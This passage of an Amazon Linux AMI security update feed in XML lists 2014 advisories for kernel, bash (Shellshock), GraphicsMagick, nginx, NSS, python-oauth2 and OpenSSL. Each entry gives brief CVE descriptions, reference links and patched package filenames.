</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6370" title="" id="CVE-2013-6370" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6371" title="" id="CVE-2013-6371" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="json-c-debuginfo" version="0.11" release="6.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/json-c-debuginfo-0.11-6.8.amzn1.x86_64.rpm</filename></package><package name="json-c" version="0.11" release="6.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/json-c-0.11-6.8.amzn1.x86_64.rpm</filename></package><package name="json-c-doc" version="0.11" release="6.8.amzn1" epoch="0" arch="noarch"><filename>Packages/json-c-doc-0.11-6.8.amzn1.noarch.rpm</filename></package><package name="json-c-devel" version="0.11" release="6.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/json-c-devel-0.11-6.8.amzn1.x86_64.rpm</filename></package><package name="json-c-debuginfo" version="0.11" release="6.8.amzn1" epoch="0" arch="i686"><filename>Packages/json-c-debuginfo-0.11-6.8.amzn1.i686.rpm</filename></package><package name="json-c" version="0.11" release="6.8.amzn1" epoch="0" arch="i686"><filename>Packages/json-c-0.11-6.8.amzn1.i686.rpm</filename></package><package name="json-c-devel" version="0.11" release="6.8.amzn1" epoch="0" arch="i686"><filename>Packages/json-c-devel-0.11-6.8.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-417</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-417: medium priority package update for kernel</title><issued date="2014-09-18 21:04:00" /><updated date="2014-09-19 12:11:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-5207:
fs/namespace.c in the Linux kernel through 3.16.1 does not properly restrict clearing MNT_NODEV, MNT_NOSUID, and MNT_NOEXEC and changing MNT_ATIME_MASK during a remount of a bind mount, which allows local users to gain privileges, interfere with backups and auditing on systems that had atime enabled, or cause a denial of service (excessive filesystem updating) on systems that had atime disabled via a "mount -o remount" command within a user namespace.
1129662:
CVE-2014-5206 CVE-2014-5207 kernel: mount flags handling during remount
CVE-2014-5206:
The do_remount function in fs/namespace.c in the Linux kernel through 3.16.1 does not maintain the MNT_LOCK_READONLY bit across a remount of a bind mount, which allows local users to bypass an intended read-only restriction and defeat certain sandbox protection mechanisms via a "mount -o remount" command within a user namespace.
1129662:
CVE-2014-5206 CVE-2014-5207 kernel: mount flags handling during remount
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5206" title="" id="CVE-2014-5206" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5207" title="" id="CVE-2014-5207" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="perf-debuginfo" version="3.14.19" release="17.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-3.14.19-17.43.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="3.14.19" release="17.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-3.14.19-17.43.amzn1.x86_64.rpm</filename></package><package name="perf" version="3.14.19" release="17.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-3.14.19-17.43.amzn1.x86_64.rpm</filename></package><package name="kernel" version="3.14.19" release="17.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-3.14.19-17.43.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="3.14.19" release="17.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-3.14.19-17.43.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="3.14.19" release="17.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-3.14.19-17.43.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="3.14.19" release="17.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-3.14.19-17.43.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="3.14.19" release="17.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-3.14.19-17.43.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="3.14.19" release="17.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-3.14.19-17.43.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="3.14.19" release="17.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-3.14.19-17.43.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="3.14.19" release="17.43.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-3.14.19-17.43.amzn1.i686.rpm</filename></package><package name="kernel" version="3.14.19" release="17.43.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-3.14.19-17.43.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="3.14.19" release="17.43.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-3.14.19-17.43.amzn1.i686.rpm</filename></package><package name="perf" version="3.14.19" release="17.43.amzn1" epoch="0" arch="i686"><filename>Packages/perf-3.14.19-17.43.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="3.14.19" release="17.43.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-3.14.19-17.43.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="3.14.19" release="17.43.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-3.14.19-17.43.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="3.14.19" release="17.43.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-3.14.19-17.43.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="3.14.19" release="17.43.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-3.14.19-17.43.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="3.14.19" release="17.43.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-3.14.19-17.43.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="3.14.19" release="17.43.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-3.14.19-17.43.amzn1.i686.rpm</filename></package><package name="kernel-doc" version="3.14.19" release="17.43.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-3.14.19-17.43.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-418</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-418: critical priority package update for bash</title><issued date="2014-09-24 07:48:00" /><updated date="2014-09-25 22:19:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-6271:
A flaw was found in the way Bash evaluated certain specially crafted environment variables. An attacker could use this flaw to override or bypass environment restrictions to execute shell commands. Certain services and applications allow remote unauthenticated attackers to provide environment variables, allowing them to exploit this issue.
1141597:
CVE-2014-6271 bash: specially-crafted environment variables can be used to inject shell commands
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271" title="" id="CVE-2014-6271" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="bash" version="4.1.2" release="15.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/bash-4.1.2-15.19.amzn1.x86_64.rpm</filename></package><package name="bash-debuginfo" version="4.1.2" release="15.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/bash-debuginfo-4.1.2-15.19.amzn1.x86_64.rpm</filename></package><package name="bash-doc" version="4.1.2" release="15.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/bash-doc-4.1.2-15.19.amzn1.x86_64.rpm</filename></package><package name="bash-doc" version="4.1.2" release="15.19.amzn1" epoch="0" arch="i686"><filename>Packages/bash-doc-4.1.2-15.19.amzn1.i686.rpm</filename></package><package name="bash" version="4.1.2" release="15.19.amzn1" epoch="0" arch="i686"><filename>Packages/bash-4.1.2-15.19.amzn1.i686.rpm</filename></package><package name="bash-debuginfo" version="4.1.2" release="15.19.amzn1" epoch="0" arch="i686"><filename>Packages/bash-debuginfo-4.1.2-15.19.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-419</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-419: important priority package update for bash</title><issued date="2014-09-24 22:26:00" /><updated date="2014-09-27 18:29:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-7187:
An off-by-one error was discovered in the way Bash was handling deeply nested flow control constructs. Depending on the layout of the .bss segment, this could allow arbitrary execution of code that would not otherwise be executed by Bash.
1146804:
CVE-2014-7187 bash: off-by-one error in deeply nested flow control constructs
CVE-2014-7186:
It was discovered that the fixed-sized redir_stack could be forced to overflow in the Bash parser, resulting in memory corruption, and possibly leading to arbitrary code execution when evaluating untrusted input that would not otherwise be run as code.
1146791:
CVE-2014-7186 bash: parser can allow out-of-bounds memory access while handling redir_stack
CVE-2014-7169:
GNU Bash through 4.3 bash43-025 processes trailing strings after certain malformed function definitions in the values of environment variables, which allows remote attackers to write to files or possibly have unknown other impact via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-6271.
Details pending
1146319:
CVE-2014-7169 bash: code execution via specially-crafted environment (Incomplete fix for CVE-2014-6271)
1146319:
CVE-2014-7169 bash: Code execution via specially-crafted environment (Incomplete fix for CVE-2014-6271)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169" title="" id="CVE-2014-7169" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7186" title="" id="CVE-2014-7186" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7187" title="" id="CVE-2014-7187" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="bash-doc" version="4.1.2" release="15.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/bash-doc-4.1.2-15.21.amzn1.x86_64.rpm</filename></package><package name="bash-debuginfo" version="4.1.2" release="15.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/bash-debuginfo-4.1.2-15.21.amzn1.x86_64.rpm</filename></package><package name="bash" version="4.1.2" release="15.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/bash-4.1.2-15.21.amzn1.x86_64.rpm</filename></package><package name="bash-debuginfo" version="4.1.2" release="15.21.amzn1" epoch="0" arch="i686"><filename>Packages/bash-debuginfo-4.1.2-15.21.amzn1.i686.rpm</filename></package><package name="bash-doc" version="4.1.2" release="15.21.amzn1" epoch="0" arch="i686"><filename>Packages/bash-doc-4.1.2-15.21.amzn1.i686.rpm</filename></package><package name="bash" version="4.1.2" release="15.21.amzn1" epoch="0" arch="i686"><filename>Packages/bash-4.1.2-15.21.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-420</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-420: medium priority package update for GraphicsMagick</title><issued date="2014-10-01 16:28:00" /><updated date="2014-10-01 18:51:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-1947:
1064098:
CVE-2014-1947 ImageMagick: PSD writing layer name buffer overflow ("L%02ld")
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1947" title="" id="CVE-2014-1947" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="GraphicsMagick-doc" version="1.3.20" release="3.5.amzn1" epoch="0" arch="noarch"><filename>Packages/GraphicsMagick-doc-1.3.20-3.5.amzn1.noarch.rpm</filename></package><package name="GraphicsMagick-devel" version="1.3.20" release="3.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/GraphicsMagick-devel-1.3.20-3.5.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick-c++" version="1.3.20" release="3.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/GraphicsMagick-c++-1.3.20-3.5.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick" version="1.3.20" release="3.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/GraphicsMagick-1.3.20-3.5.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick-c++-devel" version="1.3.20" release="3.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/GraphicsMagick-c++-devel-1.3.20-3.5.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick-perl" version="1.3.20" release="3.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/GraphicsMagick-perl-1.3.20-3.5.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick-debuginfo" version="1.3.20" release="3.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/GraphicsMagick-debuginfo-1.3.20-3.5.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick-debuginfo" version="1.3.20" release="3.5.amzn1" epoch="0" arch="i686"><filename>Packages/GraphicsMagick-debuginfo-1.3.20-3.5.amzn1.i686.rpm</filename></package><package name="GraphicsMagick" version="1.3.20" release="3.5.amzn1" epoch="0" arch="i686"><filename>Packages/GraphicsMagick-1.3.20-3.5.amzn1.i686.rpm</filename></package><package name="GraphicsMagick-devel" version="1.3.20" release="3.5.amzn1" epoch="0" arch="i686"><filename>Packages/GraphicsMagick-devel-1.3.20-3.5.amzn1.i686.rpm</filename></package><package name="GraphicsMagick-c++" version="1.3.20" release="3.5.amzn1" epoch="0" arch="i686"><filename>Packages/GraphicsMagick-c++-1.3.20-3.5.amzn1.i686.rpm</filename></package><package name="GraphicsMagick-c++-devel" version="1.3.20" release="3.5.amzn1" epoch="0" arch="i686"><filename>Packages/GraphicsMagick-c++-devel-1.3.20-3.5.amzn1.i686.rpm</filename></package><package name="GraphicsMagick-perl" version="1.3.20" release="3.5.amzn1" epoch="0" arch="i686"><filename>Packages/GraphicsMagick-perl-1.3.20-3.5.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-421</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-421: medium priority package update for nginx</title><issued date="2014-10-01 16:28:00" /><updated date="2014-10-01 18:52:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-3616:
1142573:
CVE-2014-3616 nginx: virtual host confusion
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3616" title="" id="CVE-2014-3616" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="nginx" version="1.6.2" release="1.22.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-1.6.2-1.22.amzn1.x86_64.rpm</filename></package><package name="nginx-debuginfo" version="1.6.2" release="1.22.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-debuginfo-1.6.2-1.22.amzn1.x86_64.rpm</filename></package><package name="nginx" version="1.6.2" release="1.22.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-1.6.2-1.22.amzn1.i686.rpm</filename></package><package name="nginx-debuginfo" version="1.6.2" release="1.22.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-debuginfo-1.6.2-1.22.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-422</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-422: important priority package update for nss-util</title><issued date="2014-10-01 16:32:00" /><updated date="2014-10-01 18:53:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-1568:
A flaw was found in the way NSS parsed ASN.1 (Abstract Syntax Notation One) input from certain RSA signatures. A remote attacker could use this flaw to forge RSA certificates by providing a specially crafted signature to an application using NSS.
1145429:
CVE-2014-1568 nss: RSA PKCS#1 signature verification forgery flaw (MFSA 2014-73)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1568" title="" id="CVE-2014-1568" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="nss-util-debuginfo" version="3.16.2" release="2.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-util-debuginfo-3.16.2-2.4.amzn1.x86_64.rpm</filename></package><package name="nss-util-devel" version="3.16.2" release="2.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-util-devel-3.16.2-2.4.amzn1.x86_64.rpm</filename></package><package name="nss-util" version="3.16.2" release="2.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-util-3.16.2-2.4.amzn1.x86_64.rpm</filename></package><package name="nss-util-devel" version="3.16.2" release="2.4.amzn1" epoch="0" arch="i686"><filename>Packages/nss-util-devel-3.16.2-2.4.amzn1.i686.rpm</filename></package><package name="nss-util" version="3.16.2" release="2.4.amzn1" epoch="0" arch="i686"><filename>Packages/nss-util-3.16.2-2.4.amzn1.i686.rpm</filename></package><package name="nss-util-debuginfo" version="3.16.2" release="2.4.amzn1" epoch="0" arch="i686"><filename>Packages/nss-util-debuginfo-3.16.2-2.4.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-423</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-423: important priority package update for nss-softokn</title><issued date="2014-10-01 16:32:00" /><updated date="2014-10-01 18:53:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-1568:
A flaw was found in the way NSS parsed ASN.1 (Abstract Syntax Notation One) input from certain RSA signatures. A remote attacker could use this flaw to forge RSA certificates by providing a specially crafted signature to an application using NSS.
1145429:
CVE-2014-1568 nss: RSA PKCS#1 signature verification forgery flaw (MFSA 2014-73)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1568" title="" id="CVE-2014-1568" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="nss-softokn-debuginfo" version="3.16.2" release="2.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-softokn-debuginfo-3.16.2-2.2.amzn1.x86_64.rpm</filename></package><package name="nss-softokn-devel" version="3.16.2" release="2.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-softokn-devel-3.16.2-2.2.amzn1.x86_64.rpm</filename></package><package name="nss-softokn-freebl-devel" version="3.16.2" release="2.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-softokn-freebl-devel-3.16.2-2.2.amzn1.x86_64.rpm</filename></package><package name="nss-softokn" version="3.16.2" release="2.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-softokn-3.16.2-2.2.amzn1.x86_64.rpm</filename></package><package name="nss-softokn-freebl" version="3.16.2" release="2.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-softokn-freebl-3.16.2-2.2.amzn1.x86_64.rpm</filename></package><package name="nss-softokn-debuginfo" version="3.16.2" release="2.2.amzn1" epoch="0" arch="i686"><filename>Packages/nss-softokn-debuginfo-3.16.2-2.2.amzn1.i686.rpm</filename></package><package name="nss-softokn-devel" version="3.16.2" release="2.2.amzn1" epoch="0" arch="i686"><filename>Packages/nss-softokn-devel-3.16.2-2.2.amzn1.i686.rpm</filename></package><package name="nss-softokn-freebl-devel" version="3.16.2" release="2.2.amzn1" epoch="0" arch="i686"><filename>Packages/nss-softokn-freebl-devel-3.16.2-2.2.amzn1.i686.rpm</filename></package><package name="nss-softokn" version="3.16.2" release="2.2.amzn1" epoch="0" arch="i686"><filename>Packages/nss-softokn-3.16.2-2.2.amzn1.i686.rpm</filename></package><package name="nss-softokn-freebl" version="3.16.2" release="2.2.amzn1" epoch="0" arch="i686"><filename>Packages/nss-softokn-freebl-3.16.2-2.2.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-424</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-424: important priority package update for nss</title><issued date="2014-10-01 16:32:00" /><updated date="2014-10-01 18:53:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-1568:
A flaw was found in the way NSS parsed ASN.1 (Abstract Syntax Notation One) input from certain RSA signatures. A remote attacker could use this flaw to forge RSA certificates by providing a specially crafted signature to an application using NSS.
1145429:
CVE-2014-1568 nss: RSA PKCS#1 signature verification forgery flaw (MFSA 2014-73)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1568" title="" id="CVE-2014-1568" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="nss" version="3.16.2" release="7.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-3.16.2-7.49.amzn1.x86_64.rpm</filename></package><package name="nss-sysinit" version="3.16.2" release="7.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-sysinit-3.16.2-7.49.amzn1.x86_64.rpm</filename></package><package name="nss-tools" version="3.16.2" release="7.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-tools-3.16.2-7.49.amzn1.x86_64.rpm</filename></package><package name="nss-debuginfo" version="3.16.2" release="7.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-debuginfo-3.16.2-7.49.amzn1.x86_64.rpm</filename></package><package name="nss-devel" version="3.16.2" release="7.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-devel-3.16.2-7.49.amzn1.x86_64.rpm</filename></package><package name="nss-pkcs11-devel" version="3.16.2" release="7.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-pkcs11-devel-3.16.2-7.49.amzn1.x86_64.rpm</filename></package><package name="nss-pkcs11-devel" version="3.16.2" release="7.49.amzn1" epoch="0" arch="i686"><filename>Packages/nss-pkcs11-devel-3.16.2-7.49.amzn1.i686.rpm</filename></package><package name="nss-debuginfo" version="3.16.2" release="7.49.amzn1" epoch="0" arch="i686"><filename>Packages/nss-debuginfo-3.16.2-7.49.amzn1.i686.rpm</filename></package><package name="nss-devel" version="3.16.2" release="7.49.amzn1" epoch="0" arch="i686"><filename>Packages/nss-devel-3.16.2-7.49.amzn1.i686.rpm</filename></package><package name="nss-sysinit" version="3.16.2" release="7.49.amzn1" epoch="0" arch="i686"><filename>Packages/nss-sysinit-3.16.2-7.49.amzn1.i686.rpm</filename></package><package name="nss-tools" version="3.16.2" release="7.49.amzn1" epoch="0" arch="i686"><filename>Packages/nss-tools-3.16.2-7.49.amzn1.i686.rpm</filename></package><package name="nss" version="3.16.2" release="7.49.amzn1" epoch="0" arch="i686"><filename>Packages/nss-3.16.2-7.49.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-425</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-425: medium priority package update for python-oauth2</title><issued date="2014-10-14 10:04:00" /><updated date="2014-10-14 12:30:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-4347:
The (1) make_nonce, (2) generate_nonce, and (3) generate_verifier functions in SimpleGeo python-oauth2 uses weak random numbers to generate nonces, which makes it easier for remote attackers to guess the nonce via a brute force attack.
1007758:
CVE-2013-4347 python-oauth2: Uses poor PRNG in nonce
CVE-2013-4346:
The Server.verify_request function in SimpleGeo python-oauth2 does not check the nonce, which allows remote attackers to perform replay attacks via a signed URL.
1007746:
CVE-2013-4346 python-oauth2: _check_signature() ignores the nonce value when validating signed urls
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4346" title="" id="CVE-2013-4346" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4347" title="" id="CVE-2013-4347" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python-oauth2" version="1.5.211" release="7.1.amzn1" epoch="0" arch="noarch"><filename>Packages/python-oauth2-1.5.211-7.1.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-426</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-426: important priority package update for openssl</title><issued date="2014-10-14 22:32:00" /><updated date="2014-10-14 23:34:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-3566:
1152789:
CVE-2014-3566 openssl: Padding Oracle On Downgraded Legacy Encryption attack
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566" title="" id="CVE-2014-3566" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openssl-debuginfo" version="1.0.1i" release="1.79.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-debuginfo-1.0.1i-1.79.amzn1.x86_64.rpm</filename></package><package name="openssl-static" version="1.0.1i" release="1.79.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-static-1.0.1i-1.79.amzn1.x86_64.rpm</filename></package><package name="openssl-perl" version="1.0.1i" release="1.79.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-perl-1.0.1i-1.79.amzn1.x86_64.rpm</filename></package><package name="openssl-devel" version="1.0.1i" release="1.79.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-devel-1.0.1i-1.79.amzn1.x86_64.rpm</filename></package><package name="openssl" version="1.0.1i" release="1.79.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-1.0.1i-1.79.amzn1.x86_64.rpm</filename></package><package name="openssl" version="1.0.1i" release="1.79.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-1.0.1i-1.79.amzn1.i686.rpm</filename></package><package name="openssl-debuginfo" version="1.0.1i" release="1.79.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-debuginfo-1.0.1i-1.79.amzn1.i686.rpm</filename></package><package name="openssl-perl" version="1.0.1i" release="1.79.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-perl-1.0.1i-1.79.amzn1.i686.rpm</filename></package><package name="openssl-devel" version="1.0.1i" release="1.79.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-devel-1.0.1i-1.79.amzn1.i686.rpm</filename></package><package name="openssl-static" version="1.0.1i" release="1.79.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-static-1.0.1i-1.79.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-427</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-427: important priority package update for openssl</title><issued date="2014-10-15 16:14:00" /><updated date="2014-10-15 18:38:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-3568:
1152967:
CVE-2014-3568 openssl: Build option no-ssl3 is incomplete
CVE-2014-3567:
A memory leak flaw was found in the way an OpenSSL handled failed session ticket integrity checks. A remote attacker could exhaust all available memory of an SSL/TLS or DTLS server by sending a large number of invalid session tickets to that server.
1152961:
CVE-2014-3567 openssl: Invalid TLS/SSL session tickets could cause memory leak leading to server crash
CVE-2014-3513:
A memory leak flaw was found in the way OpenSSL parsed the DTLS Secure Real-time Transport Protocol (SRTP) extension data. A remote attacker could send multiple specially crafted handshake messages to exhaust all available memory of an SSL/TLS or DTLS server.
1152953:
CVE-2014-3513 openssl: SRTP memory leak causes crash when using specially-crafted handshake message
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3513" title="" id="CVE-2014-3513" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3567" title="" id="CVE-2014-3567" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3568" title="" id="CVE-2014-3568" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openssl" version="1.0.1j" release="1.80.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-1.0.1j-1.80.amzn1.x86_64.rpm</filename></package><package name="openssl-perl" version="1.0.1j" release="1.80.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-perl-1.0.1j-1.80.amzn1.x86_64.rpm</filename></package><package name="openssl-debuginfo" version="1.0.1j" release="1.80.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-debuginfo-1.0.1j-1.80.amzn1.x86_64.rpm</filename></package><package name="openssl-static" version="1.0.1j" release="1.80.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-static-1.0.1j-1.80.amzn1.x86_64.rpm</filename></package><package name="openssl-devel" version="1.0.1j" release="1.80.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-devel-1.0.1j-1.80.amzn1.x86_64.rpm</filename></package><package name="openssl" version="1.0.1j" release="1.80.amzn1" 